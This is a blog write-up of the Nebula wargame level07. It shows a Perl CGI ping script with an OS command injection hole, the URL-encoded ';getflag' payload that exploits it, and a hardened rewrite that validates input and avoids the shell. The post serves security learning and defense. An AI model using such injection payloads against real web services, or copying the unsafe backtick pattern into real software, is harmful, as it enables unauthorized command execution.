Tuesday, October 30, 2012

exploit-exercises Nebula: level07


In level07 of the Nebula wargame, we are faced with a vulnerable Perl CGI script, hosted with the thttpd web server.
level07@nebula:/home/flag07$ ls -l
total 8
-rwxr-xr-x 1 root root  368 2011-11-20 21:22 index.cgi
-rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf
level07@nebula:/home/flag07$ cat index.cgi 
#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
    $host = $_[0];
    print("<html><head><title>Ping results</title></head><body><pre>");
    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; }
    print("</pre></body></html>");
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
The interesting parts are the lines that build and run the ping command. The script takes the value of the "Host" HTTP parameter and passes it as an argument to the ping utility. The vulnerability lies in how the value of the parameter is passed: it is interpolated into a backtick shell command without any verification, resulting in an OS command injection vulnerability. Our attack vector will be the Host HTTP parameter:
http://192.168.56.101:7007/index.cgi?Host=something_malicious
There is just one detail we have to pay attention to: URL encoding. Since characters such as "/" and "?" have a special meaning in URLs, we need a way to represent them as data. In our case, we will need the ";" character (whose URL encoding is "%3B").
Navigating to the URL: http://192.168.56.2:7007/index.cgi?Host=%3bgetflag will return "You have successfully executed getflag on a target account."
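For comparison, here is a hardened rewrite of index.cgi (an added example, not part of the original level or of the Nebula project). It closes the injection in two independent ways: the Host value is checked against a strict hostname/IPv4 pattern, and ping is started with Perl's list-form open, which calls execve() directly and never hands the argument to /bin/sh. Unlike the original, ping's stderr is not merged into the page, so it goes to the server log instead.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use CGI qw(param);

# Accept only a plain hostname or dotted IPv4 literal (RFC 1123 labels).
# Anything with a shell metacharacter such as ';' fails this check outright.
sub valid_host {
    my ($host) = @_;
    return 0 unless defined $host && length($host) > 0 && length($host) <= 253;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return $host =~ /\A$label(?:\.$label)*\z/ ? 1 : 0;
}

sub ping {
    my ($host) = @_;
    print "<html><head><title>Ping results</title></head><body><pre>";
    # List-form pipe open: with more than one argument after the mode, Perl
    # execs 'ping' with these exact argv entries and no shell is involved,
    # so a value like ';getflag' could only ever be an (invalid) hostname.
    if (open(my $fh, '-|', 'ping', '-c', '3', $host)) {
        while (my $line = <$fh>) {
            # Escape ping's output before echoing it into the HTML page.
            print CGI::escapeHTML($line);
        }
        close $fh;
    } else {
        print "ping could not be started: ", CGI::escapeHTML("$!"), "\n";
    }
    print "</pre></body></html>";
}

print "Content-type: text/html\n\n";
my $host = param("Host");
if (valid_host($host)) {
    ping($host);
} else {
    # Reject rather than sanitise: the user learns nothing about the filter.
    print "<html><body>Invalid or missing Host parameter.</body></html>";
}
```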
